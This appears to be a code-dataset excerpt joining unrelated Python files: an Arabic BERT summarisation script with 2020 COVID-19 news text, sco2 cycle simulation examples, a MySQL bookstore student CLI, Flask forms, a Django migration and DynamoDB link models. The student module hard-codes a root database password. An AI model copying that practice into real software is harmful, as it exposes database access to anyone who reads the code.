وقبل ذلك، أعلن الجيش الأميركي أن قائده في أوروبا إلى جانب عدد من الموظفين ربما تعرضوا لفيروس كورونا خلال مؤتمر عقد في الآونة الأخيرة. كما أعلن قبل أيام مكتب السيناتور الأميركي الجمهوري راند بول أنه أصيب بكورونا المستجد، ليصبح بذلك أول عضو في مجلس الشيوخ تتأكد إصابته بالفيروس.
وسبق لعضو مجلس الشيوخ الأميركي السيناتور تيد كروز أن أعلن عزل نفسه بعدما التقى شخصا ثبتت إصابته بالفيروس.
الاصابات الأكبر في إيران، أصاب الفيروس عددا من المسؤولين، وأدى في بداية الشهر الجاري إلى وفاة عضو مجلس تشخيص مصلحة النظام محمد مير محمدي.
كما أصيب بالوباء علي أكبر ولايتي مستشار المرشد الإيراني، ومعصومة ابتكار نائبة الرئيس الإيراني لشؤون المرأة، وإيرج حريرجي نائب وزير الصحة الإيراني الذي ظهر أمس الجمعة في مؤتمر صحفي عقب تعافيه من المرض.
وفي أستراليا، نقل وزير الداخلية بيتر دوتون إلى المستشفى بعدما ثبتت إصابته بفيروس كورونا، بينما أعلن في إندونيسيا أن وزير النقل بودي كاريا سومادي نقل إلى المستشفى عقب إصابته بالفيروس.
وزراء بوركينا فاسو ولئن كان الفيروس استهدف قادة عدد من الدول ومسؤوليها بشكل فردي غالبا، فقد اختلف الحال في دولة بوركينا فاسو، إذ أصاب عددا من وزرائها بشكل متزامن، ويخشى أن يشل حكومتها إذا تكشفت إصابات جديدة.
وقالت صحيفة لوموند الفرنسية إن بوركينا فاسو هي البلد الأكثر تضررا بوباء كورونا (كوفيد-19) حتى الآن في غربي أفريقيا، حيث توفيت النائبة الثانية لرئيس البرلمان وأصيب خمسة وزراء، إلى جانب الحديث عن إصابة كل من السفير الإيطالي والأميركي، مما أثار غضبا على شبكات التواصل الاجتماعي بسبب ما اعتبر "تراخي" الحكومة في إدارة الوباء.
وقالت الصحيفة في مقال بقلم صوفي دوس مراسلتها في العاصمة واغادوغو إن الأمر اعتبر في البداية أنباء كاذبة، قبل أن يؤكده أصحاب الشأن أنفسهم، فقد أعلن وزير التعليم ستانيسلاس أوارو على فيسبوك إصابته يوم 19 مارس الجاري، قائلا عقب التشخيص ظهر أنني إيجابي بالنسبة لفيروس كورونا، وفي اليوم التالي أعلن نظيراه في الإدارة الإقليمية والمعادن إصابتهما بكورونا.
ولم يتأخر وزير الشؤون الخارجية ألفا باري كثيرا بعدهم، حيث قال بعد يومين فقط من نفي الإشاعة رسميا إنه مصاب بالفيروس لقد تحققت الشائعات، تلقيت للتو اختبارا إيجابيا لكوفيد-19.
وفي 23 مارس الحالي جاء دور وزير التجارة هارونا كابوري ليعلن إصابته هو الآخر، ليكون خامس الوزراء الذين تأكدت إصابتهم من أصل 29 عضوا في حكومة بوركينا فاسو، كما تقول المراسلة، مشيرة كذلك إلى إصابة كل من السفير الإيطالي والأميركي في هذا البلد بكورونا المستجد.
'''
summary_evaluation = '''
أعلن اليوم الخميس في ماليزيا عن دخول ملك البلاد في حجر صحي بعد إصابة 7 عاملين في القصر بفيروس كورونا، ليكون بذلك أحدث زعماء العالم التحاقا بقائمة القادة الذين تحوم حولهم شبهة الإصابة بهذا الفيروس.
ويوم أمس الأربعاء، أعلن مقر إقامة ولي العهد البريطاني الأمير تشارلز إصابة الأمير بفيروس كورونا.
ومساء الأحد الماضي، أعلن في ألمانيا عن الاشتباه في إصابة المستشارة الألمانية أنجيلا ميركل بفيروس، وخضوعها لحجر منزلي رغم أن نتائج الفحوص التي أجرتها كانت سلبية، ومع ذلك قررت الخضوع للحجر الصحي والبقاء في المنزل.
في دوائر السلطة وقصور الحكم وخلال الأسابيع الماضية ومع اتساع دائرة العدوى وعدد الإصابات بفيروس كورونا في عدة دول ومناطق عبر العالم، بدأ الفيروس تدريجيا يقترب من مراكز اتخاذ القرار، وربما يعرض حياة قادة ومسؤولين كبار للخطر.
ولاحقا، أعلنت السلطات البرازيلية أن الوزير الذي التقى ترامب مصاب بالفيروس، كما وضع الرئيس جايير بولسونارو تحت المراقبة الصحية للتأكد من عدم إصابته.
وخضع الرئيس الأميركي دونالد ترامب لفحص تأكد بعده أنه غير مصاب، وذلك بعد لقائه بوفد برازيلي أحد أفراده مصاب بالفيروس.
وخلال الأسابيع الماضية أعلنت السلطات النرويجية أن الملك هارالد الخامس والملكة وكامل أعضاء الحكومة وضعوا في الحجر الصحي بسبب الفيروس.
وفي كندا، قرر رئيس الوزراء جاستن ترودو العمل من منزله بعدما تبين أن زوجته صوفي غريغوار مصابة بالوباء.
وفي فرنسا، أصيب وزير الثقافة فرانك ريستر بفيروس كورونا، كما أصيب أيضا 10 نواب على الأقل، في حين تقرر نقل اجتماعات مجلس الوزراء من القاعة التي تعقد فيها تقليديا إلى أخرى أكبر مساحة لضمان ترتيب المقاعد على مسافة متر على الأقل.
كما أعلنت وزارة الدفاع الأميركية في وقت سابق أن الوزير مارك إسبر ونائبه وضعا في الحجر الصحي بعد تأكيد إصابة عشرات من طاقم الوزارة بفيروس كورونا.
الاصابات الأكبر في إيران، أصاب الفيروس عددا من المسؤولين، وأدى في بداية الشهر الجاري إلى وفاة عضو مجلس تشخيص مصلحة النظام محمد مير محمدي.
وزراء بوركينا فاسو ولئن كان الفيروس استهدف قادة عدد من الدول ومسؤوليها بشكل فردي غالبا، فقد اختلف الحال في دولة بوركينا فاسو، إذ أصاب عددا من وزرائها بشكل متزامن، ويخشى أن يشل حكومتها إذا تكشفت إصابات جديدة.
وقالت صحيفة لوموند الفرنسية إن بوركينا فاسو هي البلد الأكثر تضررا بوباء كورونا (كوفيد-19) حتى الآن في غربي أفريقيا، حيث توفيت النائبة الثانية لرئيس البرلمان وأصيب خمسة وزراء، إلى جانب الحديث عن إصابة كل من السفير الإيطالي والأميركي، مما أثار غضبا على شبكات التواصل الاجتماعي بسبب ما اعتبر "تراخي" الحكومة في إدارة الوباء.
ولم يتأخر وزير الشؤون الخارجية ألفا باري كثيرا بعدهم، حيث قال بعد يومين فقط من نفي الإشاعة رسميا إنه مصاب بالفيروس لقد تحققت الشائعات، تلقيت للتو اختبارا إيجابيا لكوفيد-19.
'''
# Load the Arabic BERT checkpoint and its tokenizer from the Hugging Face hub.
albert_model = AutoModel.from_pretrained('asafaya/bert-base-arabic')
albert_tokenizer = AutoTokenizer.from_pretrained('asafaya/bert-base-arabic')
# Extractive summarizer driven by the custom Arabic model/tokenizer pair.
modelSummarizer = Summarizer(custom_model=albert_model, custom_tokenizer=albert_tokenizer)
result = modelSummarizer(body)
generated_summary = ''.join(result)
print(generated_summary)
# Score the generated summary against the hand-written reference summary.
rouge = Rouge()
scores = rouge.get_scores(generated_summary, summary_evaluation)
print(scores)
| 118.4375 | 346 | 0.812797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12,800 | 0.961394 |
44776d097711791cd8a71768586b334500f83487 | 3,669 | py | Python | samples/CSP/sco2_analysis_python/examples/examples_main.py | ozsolarwind/SAM | 0967b0a4be8f8924ec1ad915a14575ac22c4ec3c | [
"MIT"
] | null | null | null | samples/CSP/sco2_analysis_python/examples/examples_main.py | ozsolarwind/SAM | 0967b0a4be8f8924ec1ad915a14575ac22c4ec3c | [
"MIT"
] | null | null | null | samples/CSP/sco2_analysis_python/examples/examples_main.py | ozsolarwind/SAM | 0967b0a4be8f8924ec1ad915a14575ac22c4ec3c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 9 10:56:12 2017
@author: tneises
"""
import json
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.lines as mlines
import sys
import os
# Make the sibling "core" directory importable so the sco2 helper modules
# below resolve regardless of the current working directory.
absFilePath = os.path.abspath(__file__)
fileDir = os.path.dirname(os.path.abspath(__file__))
parentDir = os.path.dirname(fileDir)
newPath = os.path.join(parentDir, 'core')
sys.path.append(newPath)
import sco2_cycle_ssc as sco2_solve
import sco2_plots as cy_plt
##########################################
# Example 1: solve the cycle design point with the default parameter set.
"Cycle design simulation with default parameters"
c_sco2 = sco2_solve.C_sco2_sim(1)  # Initialize to the recompression cycle default (1)
c_sco2.solve_sco2_case()  # Run design simulation
print(c_sco2.m_solve_dict)
print("\nDid the simulation code solve successfully = ",c_sco2.m_solve_success)
c_sco2.m_also_save_csv = True  # also write a CSV copy of the solution
c_sco2.save_m_solve_dict("design_solution__default_pars")  # Save design solution dictionary
sol_dict__default_pars = c_sco2.m_solve_dict
##########################################
# Example 2: T-s / P-h plots for the design solution from Example 1.
"Plotting a cycle design"
c_plot = cy_plt.C_sco2_TS_PH_plot(sol_dict__default_pars)
c_plot.is_save_plot = True
c_plot.file_name = "cycle_design_plots__default_pars"
c_plot.plot_new_figure()
##########################################
# Example 3: overwrite two design parameters and re-solve.
"Modifying the cycle design parameters"
mod_base_dict = {"T_htf_hot_des" : 620, "cycle_config" : 2}
c_sco2.overwrite_des_par_base(mod_base_dict)  # Overwrite baseline design parameters
c_sco2.solve_sco2_case()  # Run design simulation
print(c_sco2.m_solve_dict)
# NOTE(review): the implicit string concatenation below drops the space
# between "with" and "modified" in the printed message.
print("\nDid the simulation code with"
      "modified design parameters solve successfully = ",c_sco2.m_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_solve_dict("design_solution__modified_pars")  # Save design solution dictionary
sol_dict__mod_pars = c_sco2.m_solve_dict
##########################################
# Example 4: overlay the default and modified designs on one plot.
"Comparing two cycle designs"
c_comp_plot = cy_plt.C_sco2_TS_PH_overlay_plot(sol_dict__default_pars, sol_dict__mod_pars)
c_comp_plot.is_save_plot = True
c_comp_plot.plot_new_figure()
##########################################
# Example 5: sweep the HTF hot design temperature from 570 to 720 in 25-degree steps.
"Running a parametric study on one design parameter"
c_sco2.reset_des_par_base_to_default_RC()
T_HTF_in_par_list = list(np.arange(570,721,25))
T_HTF_in_par_dict_list = []
for T_HTF_in in T_HTF_in_par_list:
    T_HTF_in_par_dict_list.append({"T_htf_hot_des" : T_HTF_in})
c_sco2.solve_sco2_parametric(T_HTF_in_par_dict_list)
print("\nDid the parametric analyses solve successfully = ",c_sco2.m_par_solve_success)
c_sco2.m_also_save_csv = True
c_sco2.save_m_par_solve_dict("T_HTF_parametric")
sol_dict_parametric = c_sco2.m_par_solve_dict
##########################################
# Example 6: stacked output plots of the 1-D sweep above.
"Plotting a 1D parametric study"
par_plot = cy_plt.C_des_stacked_outputs_plot([sol_dict_parametric])
par_plot.x_var = "T_HTF"
par_plot.y_vars = ["eta","MC_P_in","PHX_dT"]
par_plot.is_legend = False
par_plot.max_rows = 2
par_plot.is_save = True;
par_plot.file_name = "T_HTF_par_plot"
par_plot.create_plot()
##########################################
# Example 7: extract the last (hottest) sweep case and plot it on its own.
"Plotting one cycle design from a parametric solution dictionary"
i_plot = len(sol_dict_parametric["T_htf_hot_des"]) - 1
dict_i_plot = sco2_solve.get_one_des_dict_from_par_des_dict(sol_dict_parametric, "T_htf_hot_des", i_plot)
c_i_cycle_plot = cy_plt.C_sco2_TS_PH_plot(dict_i_plot)
c_i_cycle_plot.is_save_plot = True
c_i_cycle_plot.file_name = "cycle_design_plots__T_HTF_hottest"
c_i_cycle_plot.plot_new_figure()
##########################################
##########################################
##########################################
##########################################
##########################################
| 34.613208 | 105 | 0.693922 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,539 | 0.41946 |
4477c20c7b94d6aa48f1758a3091efc8952c26c4 | 11,944 | py | Python | Application/StudentModule.py | nimitpatel26/Book-Fetch | 1d23ff273206dd31d3c05d038468cb407cd886d1 | [
"MIT"
] | null | null | null | Application/StudentModule.py | nimitpatel26/Book-Fetch | 1d23ff273206dd31d3c05d038468cb407cd886d1 | [
"MIT"
] | null | null | null | Application/StudentModule.py | nimitpatel26/Book-Fetch | 1d23ff273206dd31d3c05d038468cb407cd886d1 | [
"MIT"
] | null | null | null | from random import randint
import datetime
import pymysql
import cgi
def getConnection():
    """Open a new connection to the local BookFetch MySQL database.

    NOTE(review): credentials are hard-coded; consider moving them to
    configuration or environment variables.
    """
    return pymysql.connect(host='localhost',
                             user='root',
                             password='w0rkb3nch',
                             db='BookFetch')
def newStudent():
    """Prompt for student details and insert Users/PhoneNumbers/Students rows.

    A semi-unique student ID is derived from the first two letters of each
    name plus "ST" and a random 3-digit suffix. All SQL now uses
    parameterized placeholders instead of string concatenation, which closes
    the SQL-injection hole the original had.
    """
    fName = input("First Name:\t ")
    lName = input("Last Name:\t ")
    email = input("Email:\t ")
    telephone = input("Telephone [##########]:\t ")
    street = input("Street:\t ")
    city = input("City:\t ")
    state = input("State:\t ")
    country = input("Country:\t ")
    major = input("Major:\t ")
    status = input("Undergrad/Graduate:\t ")
    year = input("Year [#]:\t ")
    print("-----University is a foreign key constraint!-----")
    university = input("University:\t ")
    dob = input("DOB:\t ")
    # ID format: 2 letters of first name + 2 of last + "ST" + random digits.
    id = (fName[:2] + lName[:2] + "St" + str(randint(100, 999))).upper()
    connection = getConnection()
    connection.autocommit(True)
    try:
        with connection.cursor() as cursor:
            cursor.execute(
                "insert into Users values (%s, %s, %s, %s, %s, %s, %s, %s);",
                (id, fName, lName, email, street, city, state, country),
            )
            cursor.execute(
                "insert into PhoneNumbers values (%s, %s);",
                (id, telephone),
            )
            cursor.execute(
                "insert into Students values (%s, %s, %s, %s, %s, %s);",
                (id, major, year, university, dob, status),
            )
    finally:
        connection.close()
def newCart():
    """Create a Cart row plus its created/updated date rows for a student.

    The student is looked up by first/last name and the book by title via
    subqueries. All values are bound as parameters (the original
    concatenated raw user input into the SQL). The prompt warns that a
    pre-existing cart entry will make the insert fail.
    """
    now = datetime.datetime.now()
    currentDate = str(now.month) + "/" + str(now.day) + "/" + str(now.year)
    print("-----If the already has a cart created then it will be an error.-----")
    firstName = input("Enter student's first name: ")
    lastName = input("Enter student's last name: ")
    bookTitle = input("Enter the book title: ")
    rentBuy = input("Enter purchase type (rent/buy): ")
    quantity = input("Enter quantity: ")
    wishlist = input("Wishlist (y/n): ")
    connection = getConnection()
    connection.autocommit(True)
    try:
        with connection.cursor() as cursor:
            cursor.execute(
                "insert into Cart values("
                "(select ID from Users where FirstName = %s and LastName = %s), "
                "(select ISBN from BookDetails where Title = %s), %s, %s, %s);",
                (firstName, lastName, bookTitle, rentBuy, quantity, wishlist),
            )
            cursor.execute(
                "insert into CartDateCreated values("
                "(select ID from Users where FirstName = %s and LastName = %s), %s);",
                (firstName, lastName, currentDate),
            )
            cursor.execute(
                "insert into CartDateUpdated values("
                "(select ID from Users where FirstName = %s and LastName = %s), %s);",
                (firstName, lastName, currentDate),
            )
    except pymysql.MySQLError as err:
        # The original bare `except` printed the cursor object, which hides
        # the actual failure; report the database error instead.
        print(err)
    finally:
        connection.close()
def newOrder():
    """Turn a student's non-wishlist cart items into Orders rows.

    For every cart row whose wishlist flag is "n": insert an order, delete
    the cart row, and stamp CartDateUpdated with today's date. Rows are
    fetched up front so the cursor can be reused for the writes, and all
    SQL is parameterized (the original concatenated raw user input).
    """
    now = datetime.datetime.now()
    currentDate = str(now.month) + "/" + str(now.day) + "/" + str(now.year)
    print("-----Enter the name of the user whose cart will be turned into order.-----")
    firstName = input("Enter student's first name: ")
    lastName = input("Enter student's last name: ")
    sType = input("Shipping type: ")
    ccNumber = input("Credit card number: ")
    ccExpiration = input("Credit card expiration: ")
    ccName = input("Credit card name: ")
    ccType = input("Credit card type: ")
    connection = getConnection()
    connection.autocommit(True)
    try:
        with connection.cursor() as cursor:
            cursor.execute(
                "select * from Cart where Cart.StudentID = "
                "(select ID from Users where FirstName = %s and LastName = %s);",
                (firstName, lastName),
            )
            rows = cursor.fetchall()
            for studentID, isbn, rentBuy, quantity, wishlist in rows:
                if wishlist != "n":
                    continue  # wishlist entries stay in the cart
                # Empty string = not-yet-shipped date; "new" = initial status.
                cursor.execute(
                    "insert into Orders values(%s, %s, %s, %s, %s, '', "
                    "%s, %s, %s, %s, %s, 'new');",
                    (studentID, isbn, rentBuy, quantity, currentDate,
                     sType, ccNumber, ccExpiration, ccName, ccType),
                )
                cursor.execute(
                    "delete from cart where StudentID = %s and ISBN = %s;",
                    (studentID, isbn),
                )
                cursor.execute(
                    "update CartDateUpdated set DUpdated = %s where StudentID = %s;",
                    (currentDate, studentID),
                )
    finally:
        connection.close()
def newRating():
    """Prompt for a book review and insert it into BReviewed.

    The reviewer is looked up by name and the book by title via subqueries;
    all values are bound as parameters (the original concatenated raw user
    input into the SQL, allowing injection).
    """
    print("-----Enter the name of the user who will rate a book.-----")
    firstName = input("Enter student's first name: ")
    lastName = input("Enter student's last name: ")
    bookTitle = input("Enter book title: ")
    bookRating = input("Your rating [0-5]: ")
    ratingTitle = input("Rating title: ")
    ratingDescription = input("Rating description: ")
    connection = getConnection()
    connection.autocommit(True)
    try:
        with connection.cursor() as cursor:
            cursor.execute(
                "insert into BReviewed values("
                "(select ID from Users where FirstName = %s and LastName = %s), "
                "%s, %s, "
                "(select ISBN from BookDetails where Title = %s), %s);",
                (firstName, lastName, ratingTitle, bookRating,
                 bookTitle, ratingDescription),
            )
    finally:
        connection.close()
def updateCart():
    """Ask which student's cart to modify and dispatch to add/delete.

    BUG FIX: input() returns a string, but the original compared it to the
    integers 1 and 2, so neither branch could ever execute. Compare against
    the string values instead (invalid input still falls through silently,
    as before).
    """
    print("-----Enter the name of the user who's cart you will modify.-----")
    firstName = input("Enter student's first name: ")
    lastName = input("Enter student's last name: ")
    cartOptions = (
        """Here are your options:
    1) Add to cart
    2) Delete from cart
    Enter [1-2]: """)
    userInput = input(cartOptions)
    if userInput == "1":
        addToCart(firstName, lastName)
    elif userInput == "2":
        deleteFromCart(firstName, lastName)
def addToCart(firstName, lastName):
    """Add one book entry to the named student's cart and stamp the update date.

    Args:
        firstName: student's first name (used to look up the user ID).
        lastName: student's last name.

    All SQL is parameterized (the original concatenated raw user input).
    """
    now = datetime.datetime.now()
    currentDate = str(now.month) + "/" + str(now.day) + "/" + str(now.year)
    bookTitle = input("Enter the book title: ")
    rentBuy = input("Enter purchase type (rent/buy): ")
    quantity = input("Enter quantity: ")
    wishlist = input("Wishlist (y/n): ")
    connection = getConnection()
    connection.autocommit(True)
    try:
        with connection.cursor() as cursor:
            cursor.execute(
                "insert into Cart values("
                "(select ID from Users where FirstName = %s and LastName = %s), "
                "(select ISBN from BookDetails where Title = %s), %s, %s, %s);",
                (firstName, lastName, bookTitle, rentBuy, quantity, wishlist),
            )
            cursor.execute(
                "insert into CartDateUpdated values("
                "(select ID from Users where FirstName = %s and LastName = %s), %s);",
                (firstName, lastName, currentDate),
            )
    finally:
        connection.close()
def deleteFromCart(firstName, lastName):
    """List the named student's cart, delete the chosen row, stamp the update date.

    Rows are fetched up front so the same cursor can run the delete; all
    SQL is parameterized (the original concatenated raw user input).
    """
    now = datetime.datetime.now()
    currentDate = str(now.month) + "/" + str(now.day) + "/" + str(now.year)
    connection = getConnection()
    connection.autocommit(True)
    try:
        with connection.cursor() as cursor:
            cursor.execute(
                "select * from Cart where StudentID = "
                "(select ID from Users where FirstName = %s and LastName = %s);",
                (firstName, lastName),
            )
            rows = cursor.fetchall()
            print("\nHere is the cart of " + firstName + " " + lastName)
            # Row layout: (StudentID, ISBN, RentBuy, Quantity, Wishlist).
            for index, row in enumerate(rows):
                print(str(index) + ") " + row[0] + " " + str(row[1]) + " "
                      + row[2] + " " + str(row[3]) + " " + row[4])
            deleteItem = input("Enter the number of item that you want to delete [0-"
                               + str(len(rows) - 1) + "]: ")
            chosen = rows[int(deleteItem)]
            cursor.execute(
                "delete from Cart where StudentID = %s and ISBN = %s;",
                (chosen[0], chosen[1]),
            )
            cursor.execute(
                "insert into CartDateUpdated values("
                "(select ID from Users where FirstName = %s and LastName = %s), %s);",
                (firstName, lastName, currentDate),
            )
    finally:
        connection.close()
def cancelOrder():
    """List a student's orders and delete the one the operator selects.

    An order row is identified by (StudentID, BookISBN, RentBuy,
    DateCreated), matching the original delete key. All SQL is
    parameterized (the original concatenated raw user input).
    """
    print("-----Enter the name of the user who's order you will modify.-----")
    firstName = input("Enter student's first name: ")
    lastName = input("Enter student's last name: ")
    connection = getConnection()
    connection.autocommit(True)
    try:
        with connection.cursor() as cursor:
            cursor.execute(
                "select * from Orders where StudentID = "
                "(select ID from Users where FirstName = %s and LastName = %s);",
                (firstName, lastName),
            )
            rows = cursor.fetchall()
            print("\nHere are the orders of " + firstName + " " + lastName)
            for index, row in enumerate(rows):
                print(str(index) + ") " + row[0] + " " + str(row[1]) + " "
                      + row[2] + " " + str(row[3]) + " " + row[4])
            deleteItem = input("Enter the number of item that you want to delete [0-"
                               + str(len(rows) - 1) + "]: ")
            chosen = rows[int(deleteItem)]
            cursor.execute(
                "delete from Orders where StudentID = %s and BookISBN = %s "
                "and RentBuy = %s and DateCreated = %s;",
                (chosen[0], chosen[1], chosen[2], chosen[4]),
            )
    finally:
        connection.close()
def studentModuleMain():
    """Top-level interactive menu for the student module.

    Prompts until a choice in [1, 8] is entered, then dispatches to the
    matching action. Option 7 returns to the caller; option 8 exits the
    program.
    """
    welcomeMsg = ("---------------------\nStudent Module\n---------------------")
    mainOptionsMsg = (
        """Here are your options:
    1) Create a new student
    2) Create a cart for a user
    3) Create a new order based on a cart
    4) Create a new book rating
    5) Update a cart
    6) Cancel an order
    7) Return
    8) Quit
    Enter [1-8]: """)
    invalidInputMsg = "Invalid input, please enter a valid input."
    print(welcomeMsg)
    choice = int(input(mainOptionsMsg))
    print("\n")
    # Re-prompt until the choice is inside the valid range.
    while not 1 <= choice <= 8:
        print(invalidInputMsg)
        choice = int(input(mainOptionsMsg))
        print("\n")
    if choice == 7:
        return
    if choice == 8:
        quit()
    # Map the remaining menu numbers to their handlers.
    actions = {
        1: newStudent,
        2: newCart,
        3: newOrder,
        4: newRating,
        5: updateCart,
        6: cancelOrder,
    }
    actions[choice]()
# Launch the interactive menu when the module runs.
# NOTE(review): this also runs on import; consider guarding with
# `if __name__ == "__main__":`.
studentModuleMain()
| 36.525994 | 123 | 0.48786 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,964 | 0.331882 |
447b46504e3f133d3560744b576f31426d682d53 | 1,242 | py | Python | app/main/forms.py | macymuhia/Blogspot | b1a578a4120bebb2c4c2a57201ac43eec7a161e9 | [
"MIT"
] | null | null | null | app/main/forms.py | macymuhia/Blogspot | b1a578a4120bebb2c4c2a57201ac43eec7a161e9 | [
"MIT"
] | 6 | 2021-02-08T20:33:48.000Z | 2022-03-11T23:56:14.000Z | app/main/forms.py | macymuhia/Blogspot | b1a578a4120bebb2c4c2a57201ac43eec7a161e9 | [
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SubmitField, SelectField
from wtforms.validators import Required
class BlogForm(FlaskForm):
blog_title = StringField("Blog title", validators=[Required()])
blog_description = StringField("Blog description", validators=[Required()])
story = TextAreaField("Blog content", validators=[Required()])
category = SelectField(
"Category",
choices=[
("Gaming", "Gaming"),
("Career", "Career"),
("Technology", "Technology"),
("Sports", "Sports"),
("Fitness", "Fitness"),
],
validators=[Required()],
)
submit = SubmitField("Post")
class CommentForm(FlaskForm):
details = TextAreaField("Your comment", validators=[Required()])
submit = SubmitField("Comment")
class UpdateProfile(FlaskForm):
bio = TextAreaField("Tell us about you.", validators=[Required()])
submit = SubmitField("Submit")
# class DeletePost(FlaskForm):
# comment_id = StringField()
# delete = SubmitField('Delete')
class UpdateProfile(FlaskForm):
bio = TextAreaField("Tell us about you.", validators=[Required()])
submit = SubmitField("Submit")
| 27 | 79 | 0.650564 | 981 | 0.789855 | 0 | 0 | 0 | 0 | 0 | 0 | 327 | 0.263285 |
447c96e01f699a1d061bedede73a165b4923aa49 | 404 | py | Python | backend/apps/role/migrations/0003_auto_20200329_1414.py | highproformas-friends/curaSWISS | cf6c1ac9c0c80026f1667a7155290c37be8dec7c | [
"MIT"
] | 3 | 2020-03-27T20:39:31.000Z | 2020-03-31T20:24:55.000Z | backend/apps/role/migrations/0003_auto_20200329_1414.py | highproformas-friends/curaSWISS | cf6c1ac9c0c80026f1667a7155290c37be8dec7c | [
"MIT"
] | 21 | 2020-03-28T09:57:15.000Z | 2020-03-31T11:38:00.000Z | backend/apps/role/migrations/0003_auto_20200329_1414.py | highproformas-friends/curaSWISS | cf6c1ac9c0c80026f1667a7155290c37be8dec7c | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-03-29 14:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('role', '0002_auto_20200329_1412'),
]
operations = [
migrations.AlterField(
model_name='role',
name='name',
field=models.CharField(default='', max_length=50, unique=True),
),
]
| 21.263158 | 75 | 0.596535 | 311 | 0.769802 | 0 | 0 | 0 | 0 | 0 | 0 | 92 | 0.227723 |
447d2c4718f328072ba8ec1b22b096da2c86ad41 | 2,210 | py | Python | goslinks/db/models.py | RevolutionTech/goslinks | fedb91a0d4ab227ba926f4588c7feeb3af284d2b | [
"0BSD"
] | 1 | 2020-01-22T20:49:38.000Z | 2020-01-22T20:49:38.000Z | goslinks/db/models.py | RevolutionTech/goslinks | fedb91a0d4ab227ba926f4588c7feeb3af284d2b | [
"0BSD"
] | 99 | 2019-06-04T06:12:04.000Z | 2021-10-09T22:18:42.000Z | goslinks/db/models.py | RevolutionTech/goslinks | fedb91a0d4ab227ba926f4588c7feeb3af284d2b | [
"0BSD"
] | null | null | null | from pynamodb.attributes import UnicodeAttribute
class UserModel:
    # DynamoDB-backed model for an authenticated user, keyed by email.
    # NOTE(review): this class calls cls.get()/cls.DoesNotExist (the
    # PynamoDB Model API) but does not visibly subclass
    # pynamodb.models.Model here — confirm the base class was not lost.
    class Meta:
        # DynamoDB table configuration.
        table_name = "goslinks-users"
        read_capacity_units = 1
        write_capacity_units = 1
    # Hash key: the user's email address.
    email = UnicodeAttribute(hash_key=True)
    name = UnicodeAttribute()
    photo = UnicodeAttribute()
    @property
    def organization(self):
        # The domain part of the email ("user@org" -> "org").
        _, o = self.email.split("@")
        return o
    @classmethod
    def update_or_create_user(cls, user_info):
        """Create or refresh a user record from a user-info payload.

        Expects the keys "email", "name" and "picture"; saves and returns
        the model instance.
        """
        email = user_info["email"]
        try:
            user = cls.get(email)
        except cls.DoesNotExist:
            user = cls(email)
        user.name = user_info["name"]
        user.photo = user_info["picture"]
        user.save()
        return user
class LinkModel:
    # DynamoDB-backed model for a short link. The hash key packs the
    # organization and slug together as "org|slug".
    # NOTE(review): like UserModel, this calls cls.get()/DoesNotExist
    # (PynamoDB Model API) without visibly subclassing Model — confirm.
    class Meta:
        # DynamoDB table configuration.
        table_name = "goslinks-links"
        read_capacity_units = 1
        write_capacity_units = 1
    name = UnicodeAttribute(hash_key=True)  # contains organization name and link name
    url = UnicodeAttribute()
    owner = UnicodeAttribute()  # email address of the owning user
    @staticmethod
    def name_from_organization_and_slug(organization, slug):
        # Canonical hash-key encoding: "<organization>|<slug>".
        return f"{organization}|{slug}"
    @classmethod
    def get_from_organization_and_slug(cls, organization, slug, **kwargs):
        """Fetch the link whose key encodes (organization, slug)."""
        name = cls.name_from_organization_and_slug(organization, slug)
        return cls.get(hash_key=name, **kwargs)
    @classmethod
    def get_or_init(cls, user, slug):
        """Return the existing link for (user's org, slug), or an unsaved
        new instance owned by *user*."""
        name = cls.name_from_organization_and_slug(user.organization, slug)
        try:
            link = cls.get(name)
        except cls.DoesNotExist:
            link = cls(name=name)
            link.owner = user.email
        return link
    @property
    def organization(self):
        # First component of the "org|slug" key.
        o, _ = self.name.split("|")
        return o
    @property
    def slug(self):
        # Second component of the "org|slug" key.
        _, s = self.name.split("|")
        return s
    @property
    def owner_user(self):
        """Resolve the owning user model.

        Raises AssertionError if the owner's email does not end with this
        link's organization (i.e. the owner is from a different domain).
        """
        from goslinks.db.factory import get_model
        if not self.owner.endswith(self.organization):
            raise AssertionError(
                "Owner does not belong to the organization this link is contained in"
            )
        return get_model("user").get(self.owner)
# Name -> model class table; presumably consumed by
# goslinks.db.factory.get_model (used in LinkModel.owner_user) — verify.
MODEL_REGISTRY = {"user": UserModel, "link": LinkModel}
| 25.697674 | 86 | 0.623529 | 2,097 | 0.948869 | 0 | 0 | 1,525 | 0.690045 | 0 | 0 | 216 | 0.097738 |